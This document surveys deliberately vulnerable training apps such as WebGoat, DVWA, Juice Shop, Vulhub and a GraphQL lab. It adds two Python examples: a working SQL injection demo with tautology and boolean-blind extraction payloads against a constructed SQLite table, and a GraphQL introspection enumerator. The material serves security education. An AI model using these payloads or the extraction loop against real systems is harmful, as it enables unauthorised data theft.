These open-source projects provide deliberately insecure applications for practising penetration testing and learning web application vulnerabilities. Each of them contains real, exploitable flaws, so they are meant to run as isolated, throwaway targets (a local VM or container) and never on a host reachable from a network you care about.
WebGoat is an OWASP project: a deliberately insecure Java web application organised as an interactive lab for learning how to find and exploit common web vulnerabilities. Each lesson maps a specific insecure coding pattern to a hands-on exercise, so the same flaw can be studied from the attacker's side and then from the defensive-coding side. The flaws are real server-side bugs rather than mocked behaviour, which is why the project is run as an isolated sandbox: it is distributed as a container, including a variant that bundles a browser-based desktop so the attack tooling and the target share one consistent environment, and it can be used to rehearse web attacks and penetration-testing techniques without risking production systems. Lesson availability can be configured, and each user's progress is tracked across the vulnerable lesson components.
WebGoat is a purpose-built, self-hostable training environment that provides structured, interactive lessons covering a wide range of common web vulnerabilities, making it a flagship tool for security education.
DVWA (Damn Vulnerable Web Application) is a PHP/MySQL web application that is intentionally vulnerable to the OWASP Top 10 risks and is meant to be deployed as a local penetration-testing target. Its security level can be switched between Low, Medium, High and Impossible, so the same vulnerability can be studied against progressively stronger server-side defences, with Impossible showing the correct fix. The database back end can also be switched (MySQL/MariaDB or PostgreSQL) to compare how different engines respond to injection payloads. Authentication can be disabled so that automated scanners and auditing tools can hit the vulnerable pages directly, which makes DVWA a common target for benchmarking such tools against known weaknesses. Database initialisation is done from a setup page, and the configuration can be supplied through environment variables for containerised deployments.
This is a classic, self-hostable web application built specifically to teach the OWASP Top 10 through configurable difficulty levels, and a standard target for security training, tool benchmarking and penetration-testing practice.
OWASP Juice Shop is a self-contained, intentionally vulnerable web application written in Node.js (an Express back end with an Angular front end) for security training and awareness. It contains a large set of deliberately introduced flaws arranged as challenges of graded difficulty; solving a challenge is detected server-side and shown on a live scoreboard, so users can practise offensive techniques and see their progress, and then study the defensive coding that would have prevented each flaw. Because its vulnerability set is fixed and documented, it is widely used as a benchmark target for measuring the detection rate and accuracy of automated scanners and other security tooling. Internally, the challenges are declared in a central challenge definition and tracked in a server-side registry; requests pass through Express routes and a Sequelize ORM layer over a local database, which keeps the vulnerable state consistent across interactions, and solved-challenge events are pushed to the browser over a WebSocket so the scoreboard updates immediately. The project ships as a complete, deployable application for training and testing.
This is a comprehensive, self-hostable web application specifically built to teach security through a wide range of OWASP Top 10 vulnerabilities, complete with a built-in scoreboard and guided challenges.
Vulhub is a collection of pre-built, Docker-based vulnerable environments for security research, vulnerability testing and hands-on exploitation practice. Each environment is a directory containing a docker-compose.yml and a README that describes the vulnerability and how to reproduce it, so a target running a specific known vulnerability in a real software stack can be brought up with a single compose command, together with any supporting services it needs and the networking between them. Because the stack is declared in the compose file, every researcher gets the same reproducible target. Environments are meant to be ephemeral: bring one up, test against it, inspect the container logs or exec into the container to study the affected component, then tear it down so the next session starts from a clean state. The collection is used for validating security tooling, analysing specific vulnerabilities and training.
This repository provides a collection of pre-configured, containerized environments that serve as vulnerable-by-design targets for security training and penetration testing practice.
SQL injection labs for practising error-based, boolean-based blind and time-based SQL injection.
This is a web application built specifically for practising SQL injection, with exercises for each of the main detection and extraction techniques. Its scope is narrow compared with the broader platforms above, but that focus makes it a good place to learn the techniques in depth.
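The following added example (not code from DVWA, the SQL injection labs, or any other project on this page) shows, against a constructed in-memory SQLite stand-in for a lab back end, the techniques these two entries describe: an error-based probe to confirm the parameter reaches the SQL parser, a boolean-based blind oracle, and a character-by-character extraction loop, alongside the Low-versus-Impossible difference of a concatenated query and a parameterised one. The table, the rows, the secret value and the function names are all assumptions made for the example. Time-based blind injection, the third category the lab covers, is the same loop with the oracle replaced by a response-time threshold (for example MySQL's SLEEP() inside the injected condition); it is left out here because SQLite has no sleep primitive.

```python
import sqlite3
import string

# Constructed stand-in for a lab back end (not DVWA's or sqli-labs' code):
# an in-memory SQLite table holding a secret the attacker wants to read.
SECRET = "s3cret!"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", SECRET), (2, "gordonb", "abc123")],
    )
    return conn


def lookup_low(conn, user_id):
    """'Low' level: the request parameter is concatenated straight into the SQL."""
    sql = f"SELECT name FROM users WHERE id = '{user_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_impossible(conn, user_id):
    """'Impossible' level: a parameterised query, so payloads are only ever data."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def error_probe(conn, payload="1'"):
    """Error-based detection: a stray quote that breaks the statement proves the
    parameter reaches the SQL parser. Returns the database error text, or None."""
    try:
        lookup_low(conn, payload)
    except sqlite3.Error as exc:
        return str(exc)
    return None


def boolean_oracle(conn, condition):
    """One boolean-blind request: the page either shows the row or it does not.
    The payload closes the open quote, ANDs in our condition, and re-balances."""
    return lookup_low(conn, f"1' AND ({condition}) AND '1'='1") != []


def blind_extract(conn, subquery, alphabet=string.printable.strip()):
    """Boolean-based blind extraction: learn the length, then each character.
    Quotes in candidate characters are doubled so the payload stays well formed."""
    length = 0
    for n in range(1, 65):
        if boolean_oracle(conn, f"length(({subquery})) = {n}"):
            length = n
            break
    secret = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            lit = ch.replace("'", "''")
            if boolean_oracle(conn, f"substr(({subquery}), {pos}, 1) = '{lit}'"):
                secret += ch
                break
    return secret


if __name__ == "__main__":
    db = make_db()
    print("error probe:", error_probe(db))
    print("low, tautology:", lookup_low(db, "1' OR '1'='1"))
    print("impossible, same payload:", lookup_impossible(db, "1' OR '1'='1"))
    print("blind extract:", blind_extract(db, "SELECT password FROM users WHERE name = 'admin'"))
```

Against a real lab, `lookup_low` is replaced by an HTTP request to the vulnerable page and the oracle becomes a check on the response body (or, for time-based, on elapsed time); the length-then-substr loop is unchanged. Note how `lookup_impossible` returns nothing for the tautology payload: the whole string is compared as a single value, which is the behaviour the Impossible level is meant to teach.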
WackoPicko is a vulnerable web application originally built to evaluate black-box web application vulnerability scanners, and still used for that purpose.
WackoPicko is an intentionally vulnerable web application designed for testing security scanners, which also makes it a suitable target for practising vulnerability identification, although it lacks the guided walkthroughs and management features of more modern training platforms.
Security training for the apps you actually ship. Open your browser and start hacking.
This platform provides a series of intentionally vulnerable web applications for security training and hands-on penetration-testing practice, so it meets the core requirement of a vulnerable-by-design lab environment.
Damn Vulnerable GraphQL Application is an intentionally vulnerable GraphQL service implementation designed for learning about and practising GraphQL Security.
This is a self-hostable, intentionally vulnerable GraphQL service that provides a focused environment for practicing API-specific security testing and vulnerability exploitation.
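As an added example for the GraphQL entry above (not code from the Damn Vulnerable GraphQL Application project), the block below shows the first check a tester runs against any GraphQL endpoint: send the standard introspection query and, if the server answers it, turn the reply into a list of root queries and mutations with their argument types, then flag the ones worth probing first. The sample response is constructed for the example and does not reproduce the project's real schema; the sensitive-word list and the function names are assumptions.

```python
import json

# Standard introspection query a tester sends to a GraphQL endpoint first;
# if the server answers it, the full schema is readable without credentials.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name kind
      fields(includeDeprecated: true) {
        name
        args { name type { kind name ofType { kind name ofType { kind name } } } }
        type { kind name ofType { kind name ofType { kind name } } }
      }
    }
  }
}
"""

# Assumed words that, in an operation or argument name, deserve a closer look.
SENSITIVE_WORDS = ("password", "token", "secret", "admin", "debug", "delete", "import", "system", "exec")


def render_type(t):
    """Render an introspection type reference back to SDL form, e.g. [String!]!."""
    if t is None:
        return "?"
    kind = t.get("kind")
    if kind == "NON_NULL":
        return render_type(t.get("ofType")) + "!"
    if kind == "LIST":
        return "[" + render_type(t.get("ofType")) + "]"
    return t.get("name") or "?"


def summarize_schema(response):
    """Reduce an introspection response to the root operations a tester should probe.
    Returns None when introspection is disabled (no data.__schema in the reply),
    otherwise {"queries": [...], "mutations": [...]} as SDL-like signature strings."""
    schema = (response.get("data") or {}).get("__schema")
    if not schema:
        return None
    types = {t["name"]: t for t in schema.get("types", [])}

    def operations(root):
        if not root or root.get("name") not in types:
            return []
        out = []
        for field in types[root["name"]].get("fields") or []:
            args = ", ".join(f"{a['name']}: {render_type(a['type'])}" for a in field.get("args") or [])
            out.append(f"{field['name']}({args}): {render_type(field['type'])}")
        return out

    return {"queries": operations(schema.get("queryType")),
            "mutations": operations(schema.get("mutationType"))}


def flag_sensitive(summary):
    """Return the operation signatures whose name or arguments contain a sensitive word."""
    return [sig for sig in summary["queries"] + summary["mutations"]
            if any(w in sig.lower() for w in SENSITIVE_WORDS)]


# Constructed sample reply (not the project's real schema), shaped like a
# genuine introspection response, with one query and one mutation worth flagging.
SAMPLE_RESPONSE = json.loads("""
{"data": {"__schema": {
  "queryType": {"name": "Query"},
  "mutationType": {"name": "Mutation"},
  "types": [
    {"name": "Query", "kind": "OBJECT", "fields": [
      {"name": "pastes",
       "args": [{"name": "public", "type": {"kind": "SCALAR", "name": "Boolean", "ofType": null}}],
       "type": {"kind": "LIST", "name": null, "ofType": {"kind": "OBJECT", "name": "Paste", "ofType": null}}},
      {"name": "debugLog", "args": [],
       "type": {"kind": "SCALAR", "name": "String", "ofType": null}}]},
    {"name": "Mutation", "kind": "OBJECT", "fields": [
      {"name": "login",
       "args": [{"name": "username", "type": {"kind": "NON_NULL", "name": null, "ofType": {"kind": "SCALAR", "name": "String", "ofType": null}}},
                {"name": "password", "type": {"kind": "NON_NULL", "name": null, "ofType": {"kind": "SCALAR", "name": "String", "ofType": null}}}],
       "type": {"kind": "SCALAR", "name": "String", "ofType": null}}]},
    {"name": "Paste", "kind": "OBJECT", "fields": []}
  ]}}}
""")

# What a server with introspection disabled typically returns instead.
DISABLED_RESPONSE = {"errors": [{"message": "GraphQL introspection is not allowed"}]}

if __name__ == "__main__":
    summary = summarize_schema(SAMPLE_RESPONSE)
    print("introspection enabled:", summary is not None)
    for sig in flag_sensitive(summary):
        print("probe first:", sig)
```

Against a live target, the query is sent as the JSON body `{"query": INTROSPECTION_QUERY}` in a POST to the `/graphql` endpoint and the decoded reply is passed to `summarize_schema`. A `None` result means introspection is off and field names must instead be guessed or recovered from error-message suggestions, which is a separate technique.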